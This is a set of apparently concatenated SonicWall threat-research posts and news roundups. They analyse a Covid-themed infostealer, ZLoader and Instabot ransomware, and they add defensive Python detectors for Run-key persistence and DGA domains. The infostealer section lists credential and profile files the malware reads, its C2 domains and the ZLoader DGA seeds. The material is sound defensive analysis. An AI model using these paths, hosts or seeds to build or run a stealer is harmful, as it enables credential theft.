Infostealer trojan promises protective mask for Covid-19

This week the SonicWall Capture Labs research team received yet another Trojan capitalizing on the current Covid-19 pandemic. As more and more states require citizens to wear masks in public, it was inevitable that malware authors would leverage that current event and prey on the anxiety and fears of the global population.

Infection Cycle:

The Trojan arrives in an archive possibly distributed via spam. Within that archive is a file with the following filename:

  • COVID-19_Preventive_Face_Mask.exe

Upon execution, it creates a copy of itself in the following directory:

  • %Appdata%\Roaming\maxfI\maxfI.exe

To ensure persistence it adds the following to the registry:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run   maxfI  %Appdata%\Roaming\maxfI\maxfI.exe

It also adds spurious registry data under the VB/VBA Program Settings key:

  • HKCU\Software\VB and VBA Program Settings\Ejakulerdipotassicb6\BANNETMUNDENSA   Name: CATHEXISTROPIKLUFTSPHOTOCOLL  Data: Decelerationdi

It then spawns a legitimate Windows .NET utility, Regasm.exe, to continue its malicious activity.

Regasm.exe then searches the system for internet browsing history, cookies, internet settings and the machine GUID, among many other items, and then makes a DNS query to cs58[dot]hostneverdie[dot]com.

It then establishes an encrypted connection to a remote server:

Interestingly, the domain bangbor[dot]go[dot]th appears to belong to a local government website in Thailand. Although the legitimacy of the website cannot be determined, it can only be assumed that it may have been compromised.

It continues to search the system for more information, such as browser profiles from popular web browsers including Google Chrome, Firefox, UCBrowser, Waterfox, K-Meleon and Comodo IceDragon. It also looks for data belonging to FTP clients such as FTP Navigator and FileZilla, and to mail clients such as Rimarts Becky! (B2) and The Bat!.

The following are some of the files that it tried to access:

%AppData%\Local\Google\Chrome\User Data\
%AppData%\Roaming\Mozilla\Firefox\profiles.ini
%AppData%\Local\Microsoft\Edge\User Data
%AppData%\Roaming\Opera Software\Opera Stable
%AppData%\Local\Tencent\QQBrowser\User Data
%AppData%\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage
%AppData%\Local\MapleStudio\ChromePlus\User Data
%AppData%\Local\Torch\User Data
%AppData%\Local\Yandex\YandexBrowser\User Data
%AppData%\Local\360Chrome\Chrome\User Data
%AppData%\Local\Amigo\User Data
%AppData%\Local\BraveSoftware\Brave-Browser\User Data
%AppData%\Local\CentBrowser\User Data
%AppData%\Local\Chedot\User Data
%AppData%\Local\CocCoc\Browser\User Data
%AppData%\Local\Vivaldi\User Data
%AppData%\Local\CatalinaGroup\Citrio\User Data
%AppData%\Local\liebao\User Data
%AppData%\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
%AppData%\Local\Coowon\Coowon\User Data
%AppData%\Local\Sputnik\Sputnik\User Data
%AppData%\Local\uCozMedia\Uran\User Data
%AppData%\Local\QIP Surf\User Data
%AppData%\Local\Iridium\User Data
%AppData%\Local\Comodo\Dragon\User Data
%AppData%\Local\7Star\7Star\User Data
%AppData%\Local\Elements Browser\User Data
%AppData%\Local\Epic Privacy Browser\User Data
%AppData%\Local\Kometa\User Data
%AppData%\Local\Orbitum\User Data
%AppData%\Roaming\Mozilla\icecat\profiles.ini
%AppData%\Roaming\Mozilla\SeaMonkey\profiles.ini
%AppData%\Roaming\Flock\Browser\profiles.ini
%AppData%\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
%AppData%\Roaming\8pecxstudios\Cyberfox\profiles.ini
%AppData%\Roaming\K-Meleon\profiles.ini
%AppData%\Roaming\Moonchild Productions\Pale Moon\profiles.ini
%AppData%\Roaming\Waterfox\profiles.ini
%AppData%\Roaming\Comodo\IceDragon\profiles.ini
%AppData%\Roaming\Thunderbird\profiles.ini
%AppData%\Roaming\Postbox\profiles.ini
%AppData%\Local\falkon\profiles\profiles.ini
%AppData%\Roaming\Claws-mail\clawsrc
%AppData%\Roaming\Trillian\users\global\accounts.dat
%AppData%\Local\VirtualStore\Program Files\Foxmail\mail\
%AppData%\Local\VirtualStore\Program Files (x86)\Foxmail\mail\
%AppData%\Roaming\Opera Mail\Opera Mail\wand.dat
%AppData%\Roaming\Psi\profiles
%AppData%\Roaming\Psi+\profiles
%AppData%\Roaming\Pocomail\accounts.ini
%AppData%\Roaming\FileZilla\recentservers.xml
%AppData%\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini
%AppData%\Roaming\CoreFTP\sites.idx
%AppData%\Roaming\FTPGetter\servers.xml
%AppData%\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
C:\cftp\Ftplist.txt
C:\FTP Navigator\Ftplist.txt
C:\Program Files\jDownloader\config\database.script
C:\ProgramData\APPDATA\ROAMING\FLASHFXP\3QUICK.DAT
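As an added example that is not part of the SonicWall write-up, the Python script below turns the behaviours described above into detection logic over Sysmon-style events: a Run-key value whose data points into AppData, the legitimate Regasm.exe started by a parent living in AppData, and a DNS lookup of a hostname named in the analysis. The event records, the victim user, the SID and the .NET Framework path are constructed for the demo; the maxfI value name, the %Appdata%\Roaming\maxfI path, the Regasm.exe spawn and the two domains come from the write-up. Event IDs follow Sysmon's numbering (1 process creation, 11 file creation, 13 registry value set, 22 DNS query), and the rule names are this example's own.

```python
import re
from pathlib import PureWindowsPath

# Indicators from the write-up, kept in its defanged notation.
DEFANGED_IOC_DOMAINS = ["cs58[dot]hostneverdie[dot]com", "bangbor[dot]go[dot]th"]


def refang(indicator: str) -> str:
    """Convert '[dot]' / '[.]' notation back into a resolvable, lower-cased hostname."""
    return re.sub(r"\s*\[(?:dot|\.)\]\s*", ".", indicator, flags=re.IGNORECASE).strip().lower()


IOC_DOMAINS = {refang(d) for d in DEFANGED_IOC_DOMAINS}


def in_user_writable_dir(path: str) -> bool:
    """True for paths under the per-user AppData\\Roaming or Temp trees, where the sample installs itself."""
    p = path.lower().replace("/", "\\")
    return "\\appdata\\roaming\\" in p or "\\appdata\\local\\temp\\" in p


def rule_run_key_persistence(ev: dict):
    # Sysmon 13: a Run-key value whose data points into AppData (the maxfI persistence entry).
    if ev.get("id") != 13 or "\\currentversion\\run\\" not in ev.get("target", "").lower():
        return None
    return "run_key_points_into_appdata" if in_user_writable_dir(ev.get("details", "")) else None


def rule_regasm_from_user_writable(ev: dict):
    # Sysmon 1: the legitimate .NET Regasm.exe started by a parent process living in AppData.
    if ev.get("id") != 1 or PureWindowsPath(ev.get("image", "")).name.lower() != "regasm.exe":
        return None
    return "regasm_spawned_from_appdata" if in_user_writable_dir(ev.get("parent_image", "")) else None


def rule_known_c2_dns(ev: dict):
    # Sysmon 22: DNS lookup of a hostname named in the write-up.
    if ev.get("id") != 22:
        return None
    return "dns_query_to_known_ioc" if ev.get("query", "").lower().rstrip(".") in IOC_DOMAINS else None


RULES = (rule_run_key_persistence, rule_regasm_from_user_writable, rule_known_c2_dns)


def scan(events):
    """Return (event_index, rule_name) for every event that trips a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((idx, name))
    return hits


# Constructed sample telemetry (not real logs) modelled on the infection chain described above.
SAMPLE_EVENTS = [
    {"id": 11, "image": r"C:\Users\victim\Downloads\COVID-19_Preventive_Face_Mask.exe",
     "target": r"C:\Users\victim\AppData\Roaming\maxfI\maxfI.exe"},
    {"id": 13, "image": r"C:\Users\victim\AppData\Roaming\maxfI\maxfI.exe",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\maxfI",
     "details": r"C:\Users\victim\AppData\Roaming\maxfI\maxfI.exe"},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "parent_image": r"C:\Users\victim\AppData\Roaming\maxfI\maxfI.exe"},
    {"id": 22, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "query": "cs58.hostneverdie.com"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},  # benign control event
]

if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The first two rules are behavioural and outlive any particular sample: a Run-key entry pointing into a user-writable directory and a signed Microsoft binary such as Regasm.exe being launched from AppData are both worth alerting on regardless of the domain being contacted. The DNS rule is the only one tied to this campaign's infrastructure, so it is the one to refresh as indicators change.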

During this crisis, we urge our users to only use official and reputable websites as their source of information and news. Always be vigilant and cautious when installing software programs particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Covid.N_28 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 05-14-20

This week, we spotlight 5G conspiracy theorists, government-linked attacks, and two young hackers: one who “saved the internet,” the other an “evil genius.”


SonicWall Spotlight

What are the security priorities for the post-coronavirus world? — Computer Weekly

  • Terry Greer-King, EMEA vice-president at SonicWall, believes the pandemic has accelerated an ongoing transformational shift in cybersecurity, which was driven by the continued adoption of cloud-based resources.

Maintaining Business Continuity in Cyber Threat Environment — CIO Review

  • A Q&A on cybercrimes that have spiked during the current pandemic, the impact on different sectors and recommended strategies for businesses to handle the situation.

Lurking Cyber Threats on Social Media — Dataquest

  • Debasish Mukherjee, VP Regional Sales-APAC at SonicWall, discusses the current threats on social media — including misinformation campaigns, fake profiles, data mining and social engineering — that are posing an increasing threat to users.

Cybersecurity News

Merkel cites ‘hard evidence’ she was targeted by Russian hackers — The Hill

  • German Chancellor Angela Merkel told lawmakers Wednesday that she has seen “hard evidence” of Russia-based hacking attempts targeting her emails and those of the nation’s lawmakers.

The Confessions of Marcus Hutchins, the Hacker Who Saved the Internet — Wired

  • At 22, he single-handedly put a stop to the worst cyberattack the world had ever seen. Then he was arrested by the FBI. This is his untold story.

ProLock Ransomware teams up with QakBot trojan for network access — Bleeping Computer

  • ProLock is a relatively new form of ransomware, but it has quickly attracted attention by targeting businesses and local governments and demanding huge ransoms for file decryption.

Ransomware Reminder: Paying Ransoms Doesn’t Pay — Bank Info Security

  • Still don’t believe that paying the ransoms demanded by cybercriminals is a bad idea? A recent survey presents further proof.

Researchers expose new malware designed to steal data from air-gapped networks — Cyberscoop

  • ESET is hoping publicizing the malware will shake loose clues in their hunt for the enigmatic hackers.

Hackers Target WHO by Posing as Think Tank, Broadcaster — Bloomberg

  • Employees of the World Health Organization have been targeted with coronavirus-related emails purporting to be from news organizations and researchers — but which actually originate with an Iranian hacker group.

U.S. accuses China-linked hackers of stealing coronavirus research — Reuters

  • According to U.S. officials, China-linked hackers are breaking into American organizations researching COVID-19. The report warns scientists and public health officials to be on the lookout for cyber theft.

The 5G Coronavirus Conspiracy Theory Has Taken a Dark Turn — Wired

  • Though social networks have pledged to take more concerted action against conspiracy theories, the 5G hoax has continued to spread, inspiring a surge of attacks.

Sodinokibi ransomware can now encrypt open and locked files — Bleeping Computer

  • The Sodinokibi (REvil) ransomware has added a new feature that makes it easier to encrypt all files, even those that are opened and locked by another process.

Teen Hacker and Crew of ‘Evil Geniuses’ Accused of $24 Million Crypto Theft — Bloomberg

  • An adviser to blockchain companies is claiming a 15-year-old and his crew of “evil computer geniuses” stole $24 million in cryptocurrency from him by hacking into his phone.

In Case You Missed It

Microsoft Security Bulletin Coverage for May 2020

The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2020. A list of the issues reported, along with SonicWall coverage information, is as follows:

CVE-2020-0901 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-0909 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-0963 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1010 Microsoft Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1021 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1023 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1024 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1028 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1035 VBScript Remote Code Execution Vulnerability
IPS 14992:VBScript Remote Code Execution Vulnerability (CVE-2020-1035)
CVE-2020-1037 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1048 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1051 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1054 Win32k Elevation of Privilege Vulnerability
ASPY 5938:Malformed-File exe.MP.137
CVE-2020-1055 Microsoft Active Directory Federation Services Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1056 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1058 VBScript Remote Code Execution Vulnerability
IPS 14993:VBScript Remote Code Execution Vulnerability (CVE-2020-1058)
CVE-2020-1059 Microsoft Edge Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1060 VBScript Remote Code Execution Vulnerability
IPS 11663:Suspicious JavaScript/VBScript Code 54
CVE-2020-1061 Microsoft Script Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1062 Internet Explorer Memory Corruption Vulnerability
IPS 14990:Internet Explorer Memory Corruption Vulnerability (CVE-2020-1062)
CVE-2020-1063 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1064 MSHTML Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1065 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1066 .NET Framework Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1067 Windows Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1068 Microsoft Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1069 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1070 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1071 Windows Remote Access Common Dialog Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1072 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1075 Windows Subsystem for Linux Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1076 Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1077 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1078 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1079 Microsoft Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1081 Windows Printer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1082 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1084 Connected User Experiences and Telemetry Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1086 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1087 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1088 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1090 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1092 Internet Explorer Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1093 VBScript Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1096 Microsoft Edge PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1099 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1100 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1101 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1102 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1103 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1104 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1105 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1106 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1107 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1108 .NET Core Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1109 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1110 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1111 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1112 Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1113 Windows Task Scheduler Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-1114 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1116 Windows CSRSS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1117 Microsoft Color Management Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1118 Microsoft Windows Transport Layer Security Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1121 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1123 Connected User Experiences and Telemetry Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1124 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1125 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1126 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1131 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1132 Windows Error Reporting Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1134 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1135 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5936:Malformed-File exe.MP.136
CVE-2020-1136 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1137 Windows Push Notification Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1138 Windows Storage Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1139 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1140 DirectX Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1141 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1142 Windows GDI Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1143 Win32k Elevation of Privilege Vulnerability
ASPY 5935:Malformed-File exe.MP.135
CVE-2020-1144 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1145 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1149 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1150 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1151 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1153 Microsoft Graphics Components Remote Code Execution Vulnerability
ASPY 5937:Malformed-File otf.MP.23
CVE-2020-1154 Windows Common Log File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1155 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1156 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1157 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1158 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1161 ASP.NET Core Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1164 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1165 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1166 Windows Clipboard Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1171 Visual Studio Code Python Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1173 Microsoft Power BI Report Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1174 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1175 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1176 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1179 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1184 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1185 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1186 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1187 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1188 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1189 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1190 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1191 Windows State Repository Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1192 Visual Studio Code Python Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.

ZLoader aka Terdot, DELoader

Overview:

The SonicWall Capture Labs Threat Research Team has observed and trapped activity for the malware family called “Zeus Sphinx”, a banking Trojan. Sphinx goes by many other names, including ZLoader, Terdot and DELoader. ZLoader has resurfaced to take advantage of government relief payments amid COVID-19.

Samples: 3rd Layer, Static Information:

Looking at the third layer in CFF Explorer and checking for corruption: the third layer is a Win32 binary.

Command-Line Static Information:

Unpacking The Sample:

  1) The sample’s strings are heavily encrypted and obfuscated. You will need to write your own IDC or Python plugin inside IDA Pro to decrypt them dynamically.
  2) API calls are hidden by resolving them dynamically from function hashes. IDA Pro’s scripting manual will help you evaluate the routines that resolve to Microsoft’s API names.
  3) The code uses constant unfolding, dead-code insertion and arithmetic substitution via identities.
  4) Once the strings are decrypted, the decryption call for the string “.com” leads to the DGA routine, or you can use your own technique to find it. There is always more than one way to do this step.
  5) Understanding the pseudo-random number generator will require you to manually define logical equivalences for small snippets of its seed-generation algorithm.
  • The live session below is from IDA Pro, showing Kernel32.dll string decryption:

    The strings below are from the thirty-eight calls to decrypt_string:

    To locate the DGA algorithm you will have to decrypt all 38 calls to “decrypt_string”, which is why automation is your friend when unpacking this sample.

Seeds:

Seed values used with DGA are as follows: q23Cud3xsNf3, 41997b4a729e1a0175208305170752dd, kZieCw23gffpe43Sd

Domains:

May 08th, 2020, Generated Domain Names:
hctvtocmttbwhpckcjcc.com
aosinfmwfnymlyerbtgk.com
njdnlnmhxwgtqakbeasg.com
lpnueaooqsytsshlbgxn.com
kbebomcngxvckfoudhct.com
yixydgdeovjpgcgbsqxp.com
ntvtwjeedakwwmcexrlj.com
hrihpfdvmhqerbafkucc.com
bnqupgrocpuiouglqqkl.com
irggjkpjmroxljusesjn.com
haymnndsysmtqnjmytsg.com
hlbhbxktyyjrlmixyhwu.com
nevlrqyolqqbqsijrmus.com
hlbdtbxkjvayignolnyi.com
vwcpuyxgvsklhvvlbdtx.com
wfnvuukycdmtaqpxoajk.com
plrpboptbgcyqbqrbsdt.com
koibanoohdjhriuohlbg.com
xvcakbeasgildijbykit.com
junbhxtwqgqcymafwuby.com
jvaxixayhwqnvhrhfijo.com
hckixydsdgcuywdoyopt.com
bgoasrnoptjolgsegewn.com
jcbnrtncovjsywhsyspc.com
cqhdwqnvhnbhxtnyfred.com
qwqxpmihnqevogytstgj.com
nqqwmweecoonfukmtbtg.com
nreumcipiatuuxxekwer.com
bqsmbfvflwsuglpnuirj.com
uqsdhfccnswutkwqkqkh.com
uvjyewrmlmmfvemllajb.com
ykitvkfrehhnuewnjywa.com
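The DGA routine itself is not reproduced in the write-up, but the generated domains above share a shape that a defender can key on: twenty-letter second-level labels under .com with very few vowels and long consonant clusters. As an added example that is not part of the SonicWall analysis, the Python script below scores observed domains with two simple lexical features (vowel ratio and longest consonant run) and splits them into suspicious and benign. The thresholds are this example's own choice, tuned against the May 8th list; the benign hostnames in the sample input are constructed for the demo.

```python
VOWELS = set("aeiou")


def second_level_label(domain: str) -> str:
    """'hctvtocmttbwhpckcjcc.com' -> 'hctvtocmttbwhpckcjcc'; 'www.sonicwall.com' -> 'sonicwall'."""
    parts = domain.lower().strip().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def longest_consonant_run(label: str) -> int:
    """Longest run of consecutive consonant letters; vowels, digits and hyphens break the run."""
    best = run = 0
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def vowel_ratio(label: str) -> float:
    """Fraction of alphabetic characters that are vowels (0.0 for a label with no letters)."""
    letters = [c for c in label if c.isalpha()]
    return sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0


def dga_features(domain: str):
    """(label length, longest consonant run, vowel ratio) for the second-level label."""
    label = second_level_label(domain)
    return len(label), longest_consonant_run(label), vowel_ratio(label)


def is_dga_like(domain: str, min_len: int = 12, min_run: int = 5, max_vowel_ratio: float = 0.2) -> bool:
    """Heuristic: a long second-level label that is either vowel-starved or has a long consonant run.
    The thresholds are this example's choice, not values from the write-up."""
    length, run, ratio = dga_features(domain)
    if length < min_len:
        return False
    return run >= min_run or ratio <= max_vowel_ratio


def triage(domains):
    """Split a list of observed domains into (suspicious, benign), preserving order."""
    suspicious = [d for d in domains if is_dga_like(d)]
    benign = [d for d in domains if not is_dga_like(d)]
    return suspicious, benign


# Constructed input: four domains from the May 8th list above plus four benign hostnames.
OBSERVED = [
    "hctvtocmttbwhpckcjcc.com", "aosinfmwfnymlyerbtgk.com",
    "ntvtwjeedakwwmcexrlj.com", "ykitvkfrehhnuewnjywa.com",
    "www.sonicwall.com", "www.microsoft.com",
    "bleepingcomputer.com", "windowsupdate.microsoft.com",
]

if __name__ == "__main__":
    suspicious, benign = triage(OBSERVED)
    for d in suspicious:
        print("suspicious", d, dga_features(d))
    for d in benign:
        print("benign    ", d, dga_features(d))
```

Lexical scoring of this kind is a triage aid, not a verdict: brand names with consonant clusters will trip it, and a DGA that draws from a dictionary will not. In practice it is paired with the family-specific fingerprint visible in the list above (fixed twenty-letter labels, always .com) and with resolution data, since unregistered domains from a DGA produce bursts of NXDOMAIN answers.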

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

Summary:

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: Zloader.A (Trojan)

Appendix:

Sample Hash: 4029f9fcba1c53d86f2c59f07d5657930bd5ee64cca4c5929cbd3142484e815a

Instabot ransomware demands $490 in Bitcoin after 50% discount

The SonicWall Capture Labs threat research team has come across new ransomware known to the antivirus community as Instabot. It is actively spreading, and the web server used by the operators was online at the time of writing. The operators charge $980 in Bitcoin for file recovery but also offer a 50% discount if payment is made within 72 hours.

Infection Cycle:

The malware uses the following icon:

The malware makes the following DNS request:

  • akbz.top

The malware reports the infection to a remote server.  This includes the public key:

Requests are made to a remote server to download additional malware.  Not all requests were successful:


The following files are added to the filesystem:

  • %APPDATA%\cef8b3be-77de-4842-b1ba-45fe8e197331\{original filename}.exe
  • %APPDATA%\456888e5-7040-4fd5-8f4b-c39f07380640\updatewin1.exe [Detected as: GAV: Instabot.RSM_7 (Trojan) ]
  • %APPDATA%\456888e5-7040-4fd5-8f4b-c39f07380640\updatewin2.exe [Detected as: GAV: Instabot.RSM_8 (Trojan) ]
  • _readme.txt (copied into directories where files were encrypted)

Encrypted files are given a .sqpc extension.

_readme.txt contains the ransom message shown below.  It demands $490 USD for file recovery after a 50% discount:

We reached out to the operators via email and received the following response:

In the email message, a link to a video demonstrating how to use the decryption tool is provided.  The following are some screenshots from the video:

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Instabot.RSM_7 (Trojan)
  • GAV: Instabot.RSM_8 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 05-07-20

This week, healthcare continues to be in the crosshairs and ransomware-for-hire continues to mean big paydays for cybercriminals.


SonicWall Spotlight

Hackers Are Calling In The Raccoons — Fudzilla

  • Hackers are exploiting anxiety around Covid-19 to create new hooks for their malware, such as the new Raccoon Stealer variant uncovered by SonicWall’s Threat Research team.

SonicWall Called Upon by Health Giant GNC to Rapidly Provide Protection of Remote, Mobile Workforce — CXOToday

  • SonicWall and GNC Holdings (GNC), a leading global health and wellness brand, are working closely to increase capacity of the company’s existing Secure Mobile Access (SMA) deployment to connect and secure the company’s growing volume of work-from-home employees.

Web-applications Attacks, Including SQL Injection Attacks, More Than Doubled In 2019, According To Data From Sonicwall — Security Boulevard

  • What is an SQL injection attack? How common are they? And why are they so devastating? Security Boulevard weighs in on these nefarious attacks, and gives tips on how to prevent them.

Cybersecurity News

It Has Been 20 Years Since Cybercrime Woke Up To Social Engineering With An Intriguing Little Email Titled ‘ILOVEYOU’ — The Register

  • Two decades have passed since cybercrooks demonstrated the role exploiting human psychology could play in spreading malware.

10 Questions With Tech Data Security Guru Alex Ryals On Security Trends And Training In Isolation — CRN

